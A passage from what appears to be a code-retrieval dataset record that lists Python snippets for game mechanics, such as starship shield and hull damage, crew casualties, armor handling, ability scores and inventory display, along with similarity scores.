0.0:\n amount = round(amount * uniform(1.0 - random_varation, 1.0))\n \n old_scan = scan_dict if scan_dict else self.scan_this_ship(\n precision, scan_for_crew=calculate_crew, \n scan_for_systems=calculate_systems, \n use_effective_values=use_effective_values\n )\n try:\n current_shields:int = old_scan[\"shields\"]\n except KeyError:\n current_shields = 0\n try:\n polarization:int = old_scan[\"polarization\"]\n \n if calculate_systems:\n \n polarization = round(polarization * (\n ajust_system_integrity(\n old_scan[\"sys_polarize\"]\n ) if use_effective_values else old_scan[\"sys_polarize\"]\n ))\n except KeyError:\n polarization = 0\n current_hull:int = old_scan[\"hull\"]\n \n old_status = self.ship_status\n \n is_hulk = current_hull < 0\n \n try:\n is_derlict = old_scan[\"able_crew\"] + old_scan[\"injured_crew\"] <= 0\n except KeyError:\n is_derlict = False\n try:\n shield_effectiveness = ajust_system_integrity(old_scan[\"sys_shield\"]) if use_effective_values else old_scan[\"sys_shield\"]\n except KeyError:\n shield_effectiveness = 1\n \n shields_are_already_down = shield_effectiveness <= 0 or current_shields <= 0 or not old_status.do_shields_work or not self.shield_generator.shields_up\n \n shields_dam = 0\n armorDam = amount\n hull_dam = amount\n \n shield_dam_multi = damage_type.damage_vs_shields_multiplier\n\n armorHullDamMulti = (\n damage_type.damage_vs_no_shield_multiplier \n if shields_are_already_down else damage_type.damage_vs_hull_multiplier\n ) \n try:\n shields_percentage = current_shields / self.ship_class.max_shields\n except ZeroDivisionError:\n shields_percentage = 0\n shields_are_already_down = True\n \n bleedthru_factor = min(shields_percentage + 0.5, 1.0)\n \n if shields_are_already_down:\n \n hull_dam = amount * armorHullDamMulti\n else:\n to_add = 0\n shields_dam = amount * bleedthru_factor * shield_dam_multi\n if shields_dam > current_shields:\n to_add = shields_dam - current_shields\n \n shields_dam = current_shields\n amount *= (1 - bleedthru_factor)\n amount += to_add\n hull_dam = amount * armorHullDamMulti\n \n hull_dam = round(calculate_polarization(hull_dam, polarization))\n \n new_shields = scan_assistant(current_shields - shields_dam, precision) if shields_dam > 0 else current_shields\n new_hull = scan_assistant(current_hull - hull_dam, precision) if hull_dam > 0 else current_hull\n \n hull_damage_as_a_percent = hull_dam / self.ship_class.max_hull\n try:\n new_shields_as_a_percent = new_shields / self.ship_class.max_shields\n except ZeroDivisionError:\n 
new_shields_as_a_percent = 0\n new_hull_as_a_percent = new_hull / self.ship_class.max_hull\n \n killed_outright = 0\n killed_in_sickbay = 0\n wounded = 0\n \n if calculate_crew and not is_derlict and not is_hulk:\n \n crew_killed = hull_dam > 0 and new_hull_as_a_percent < random() and not self.ship_class.is_automated\n \n if crew_killed:\n able_crew = old_scan[\"able_crew\"]\n injured_crew = old_scan[\"injured_crew\"]\n \n percentage_of_crew_killed = hull_damage_as_a_percent * random()\n \n total_crew = able_crew + injured_crew\n \n wounded_fac = uniform(0.25, 0.75)\n \n _able_crew_percentage = able_crew / total_crew\n \n percentage_of_able_crew_killed = _able_crew_percentage * (percentage_of_crew_killed * (1 - wounded_fac))\n percentage_of_able_crew_wounded = _able_crew_percentage * (percentage_of_crew_killed * (wounded_fac))\n percentage_of_injured_crew_killed = (injured_crew / total_crew) * percentage_of_crew_killed\n \n killed_outright = round(self.life_support.able_crew * percentage_of_able_crew_killed)\n killed_in_sickbay = round(0.5 * self.life_support.able_crew * percentage_of_injured_crew_killed)\n wounded = round(self.life_support.able_crew * percentage_of_able_crew_wounded)\n \n shield_sys_damage = 0\n energy_weapons_sys_damage = 0\n cannon_sys_damage = 0\n impulse_sys_damage = 0\n warp_drive_sys_damage = 0\n sensors_sys_damage = 0\n torpedo_sys_damage = 0\n warp_core_sys_damage = 0\n cloak_sys_damage = 0\n transporter_sys_damage = 0\n polarized_hull_damage = 0\n scanners_damage = 0\n \n if calculate_systems and not is_hulk:\n chance_to_damage_system = damage_type.chance_to_damage_system\n \n systems_damaged = hull_dam > 0 and new_hull_as_a_percent < uniform(\n hull_damage_as_a_percent, 1.25 + hull_damage_as_a_percent)\n \n if systems_damaged:\n system_damage_chance = damage_type.damage_chance_vs_systems_multiplier\n \n def chance_of_system_damage():\n # this is cumbersome. 
A better way may be random() * chance_to_damage_system > (old_hull_as_a_percent + new_hull_as_a_percent) * 0.5\n return uniform(\n hull_damage_as_a_percent, chance_to_damage_system + hull_damage_as_a_percent\n ) > new_hull_as_a_percent\n \n def random_system_damage():\n return uniform(0.0, system_damage_chance * hull_damage_as_a_percent)\n \n if self.ship_class.max_shields and chance_of_system_damage():\n shield_sys_damage = random_system_damage()\n \n if self.ship_class.max_beam_energy and chance_of_system_damage():\n energy_weapons_sys_damage = random_system_damage()\n \n if self.ship_class.max_cannon_energy and chance_of_system_damage():\n cannon_sys_damage = random_system_damage()\n \n if self.ship_class.evasion and chance_of_system_damage():\n impulse_sys_damage = random_system_damage()\n \n if self.ship_class.max_warp and chance_of_system_damage():\n warp_drive_sys_damage = random_system_damage()\n \n if chance_of_system_damage():\n sensors_sys_damage = random_system_damage()\n \n if self.ship_class.max_torpedos and chance_of_system_damage():\n torpedo_sys_damage = random_system_damage()\n \n if chance_of_system_damage():\n warp_core_sys_damage = random_system_damage()\n \n if self.ship_class.cloak_strength and chance_of_system_damage():\n cloak_sys_damage = random_system_damage()\n \n if self.ship_class.max_crew and chance_of_system_damage():\n transporter_sys_damage = random_system_damage()\n \n if self.ship_class.polarized_hull and chance_of_system_damage():\n polarized_hull_damage = random_system_damage()\n \n if chance_of_system_damage():\n scanners_damage = random_system_damage()\n \n return (\n new_shields, new_hull, shields_dam, hull_dam, new_shields_as_a_percent, \n new_hull_as_a_percent, killed_outright, killed_in_sickbay, wounded, shield_sys_damage, \n impulse_sys_damage, warp_drive_sys_damage, sensors_sys_damage, \n warp_core_sys_damage, \n energy_weapons_sys_damage, cannon_sys_damage, \n torpedo_sys_damage, cloak_sys_damage, transporter_sys_damage, polarized_hull_damage, scanners_damage\n )", "def get_total_shield(self,obs):", "def choose_armor_throw(saving_throws):\n for i, value in enumerate(saving_throws, start=1):\n print('({}) {}'.format(i, value))\n b = _input('Choose armor penalty (-4):')\n\n return saving_throws[int(b)-1]", "def takeHit(self, amount, type, enemyShip):\n if type == 'energy':\n # go through shields in quadrant first\n if self.currentSP > 0:\n if self.currentSP >= amount:\n self.currentSP -= amount\n amount = 0\n else:\n amount -= self.currentSP\n self.currentSP = 0\n # go through armor next\n if self.currentAP > 0 and amount > 0:\n # set experience only if shot goes through shields\n if self.typeAP == 'energy':\n if self.currentAP >= (amount * globals.reflectiveArmorModifier):\n self.currentAP -= (amount * globals.reflectiveArmorModifier)\n amount = 0\n else:\n amount -= (self.currentAP/globals.reflectiveArmorModifier)\n self.currentAP = 0\n else:\n if self.currentAP >= amount:\n self.currentAP -= amount\n amount = 0\n else:\n amount -= self.currentAP\n self.currentAP = 0\n elif type == 'impact':\n # go through shields in quadrant first\n if self.currentSP > 0:\n if self.currentSP >= amount:\n self.currentSP -= amount/2\n amount = amount/2\n else:\n amount -= self.currentSP\n self.currentSP = 0\n \n # now goto armor\n if self.currentAP > 0 and amount > 0:\n if self.typeAP == 'impact':\n if self.currentAP >= (amount * globals.impactArmorModifier):\n self.currentAP -= (amount * globals.impactArmorModifier)\n amount = 0\n else:\n amount -= 
(self.currentAP/globals.impactArmorModifier)\n self.currentAP = 0\n else:\n if self.currentAP >= amount:\n self.currentAP -= amount\n amount = 0\n else:\n amount -= self.currentAP\n self.currentAP = 0\n \n # now that shields and armor are taken care of transfer remaining damage to internal components\n self.myParent.setExperience(amount, enemyShip)\n componentDamage = 0\n if amount > 0 and self.components != {}:\n while amount > 0:\n keyList = funcs.sortStringList(self.components.keys())\n componentDamage = 1\n for componentID in keyList:\n component = self.components[componentID]\n if component.currentHP > amount:\n component.currentHP -= amount\n amount = 0\n break\n elif component.currentHP > 0:\n # remove component\n amount -= component.currentHP\n del self.components[componentID]\n \n # check if all components destroyed, or damage absorbed\n if self.components == {} or amount == 0:\n break\n \n if componentDamage == 1:\n self.setMyStatus()\n self.myParent.setMyStatus()\n \n if amount > 0:\n if self.myParent.currentISP > amount:\n self.myParent.currentISP -= amount\n self.myParent.setMyStatus()\n amount = 0\n else:\n self.myParent.destroyMe()\n amount = 0\n \n self.myParent.updateAllGUIValues()", "def get_hp():\n\n return character['HP']", "def getAbilityScores(self):\n mods = [(self.str -10)/2,\n (self.dex-10)/2,\n (self.con-10)/2,\n (self.int-10)/2,\n (self.wis-10)/2,\n (self.cha-10)/2]\n print \"STR: {0} ({1}) \\nDEX: {2} ({3})\\nCON: {4} ({5})\".format(self.str,\n mods[0],\n self.dex,\n mods[1],\n self.con,\n mods[2])\n print \"INT: {0} ({1})\\nWIS: {2} ({3})\\nCHA: {4} ({5})\".format(self.int,\n mods[3],\n self.wis,\n mods[4],\n self.cha,\n mods[5])", "def info_equipment_silos_get():\n equipment = _equipment_by_group(404) # 404 == Silo\n return equipment, 200", "def print_inventory(self):\n\t\tfor item, amount in self.inventoryDictionary.items():\n\t\t\tprint (\"Item: \" + item.name + \" Quantity: \" + str(amount))\n\t\t\tprint (item.description + \"\\n\")\n\n\t\tprint(\"Currently equipped: \")\n\t\tprint(\"Main Hand: \" + self.equippedMainHand.name)\n\t\tprint(\"Armor: \" + self.equippedArmor.name)", "def get_main_hand_equipped(self):\n\t\treturn self.equippedMainHand", "def get_inventory():\n return INVENTORY", "def get_residue_info(self):\n return", "def setArmor(self, armor):\n self.av = armor" ]
[ "0.672655", "0.6709763", "0.6709763", "0.6694133", "0.5853349", "0.5786742", "0.5659746", "0.56013674", "0.5586368", "0.55516726", "0.54307085", "0.54023623", "0.52987903", "0.5295258", "0.52864414", "0.524963", "0.52466756", "0.5236324", "0.52125114", "0.5185202", "0.5182413", "0.5157946", "0.5107714", "0.50993043", "0.50896376", "0.50444233", "0.5043505", "0.50234234", "0.4996699", "0.49954265" ]
0.70991963
0
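Display code usually wants the resists as integer percentages rather than the fractions the armor property computes (1.0 minus the stored damage multiplier). A small adapter, assuming only the dict shape returned above:

def resists_as_percentages(armor_info):
    # armor_info: the dict returned by the armor property above
    return {
        damage_type: round(resist * 100)
        for damage_type, resist in armor_info["resists"].items()
    }

# e.g. {"em": 0.5, "explosive": 0.1, ...} -> {"em": 50, "explosive": 10, ...}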